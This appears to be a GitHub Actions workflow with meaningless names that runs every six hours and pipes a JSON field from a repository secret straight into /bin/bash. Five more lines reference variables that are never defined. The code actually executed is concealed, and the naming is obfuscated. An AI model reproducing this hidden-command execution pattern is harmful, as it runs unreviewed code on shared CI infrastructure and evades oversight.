name: zhengqilu9810
on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhengqilu9810
        env:
          lis3: ${{ secrets.lis3 }}
        run: |
          echo $lis3 | jq -r .qq97 | /bin/bash
          echo $ojm08 | jq -r .stgaw0037 | /bin/bash
          echo $kwfpz81 | jq -r .wvwsj8 | /bin/bash
          echo $tbig3 | jq -r .ovv107 | /bin/bash
          echo $s16 | jq -r .qvgt3 | /bin/bash
          echo $fvqe35413 | jq -r .gpefz611 | /bin/bash

